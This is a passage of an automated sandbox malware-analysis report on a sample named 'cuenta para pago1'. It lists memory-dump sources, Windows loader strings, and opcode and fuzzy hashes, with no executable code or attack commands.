                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3492A79F
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 3492A7AF
                                                                                      • apphelp.dll, xrefs: 348E2382
                                                                                      • LdrpDynamicShimModule, xrefs: 3492A7A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-176724104
                                                                                      • Opcode ID: 92bea6441e7a06b9a9c7e6e538c744163bd1de69089e095ccaf1db9c5e00903a
                                                                                      • Instruction ID: 53ee98cb0d65ac4383f191712bf90881dac869b4523a7c9e26027bf73bdbb025
                                                                                      • Opcode Fuzzy Hash: 92bea6441e7a06b9a9c7e6e538c744163bd1de69089e095ccaf1db9c5e00903a
                                                                                      • Instruction Fuzzy Hash: E2311676A04204EFFB20DF5DC880A597BB9EBC4750F14415DE90077254DBB0AC82CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 095e9e0839a0f279398120ccfab4849980e2d366eca474de78a9840015dadac6
                                                                                      • Instruction ID: bc4efafb823c30aea86754c6e0a1a0cd4aab922b6301175a8b24bff436e73b25
                                                                                      • Opcode Fuzzy Hash: 095e9e0839a0f279398120ccfab4849980e2d366eca474de78a9840015dadac6
                                                                                      • Instruction Fuzzy Hash: B9E11275E00708DFEB25CFA9C980AADBBF5FF49340F10466AEA55A7264D771A881CF10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: 0$0
                                                                                      • API String ID: 3446177414-203156872
                                                                                      • Opcode ID: a1f9f124d1767215975d94f4e9c49b81e136d1ae49450340b6358e0640506a23
                                                                                      • Instruction ID: 6a907e13b9ad420d5dac6531e93bb9d4e8f5b502a3a1b64158b54de56f80a085
                                                                                      • Opcode Fuzzy Hash: a1f9f124d1767215975d94f4e9c49b81e136d1ae49450340b6358e0640506a23
                                                                                      • Instruction Fuzzy Hash: 10415BB5608705AFD700CF28C444A5ABBE9FF89358F044A6EF988DB341D771EA05CB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%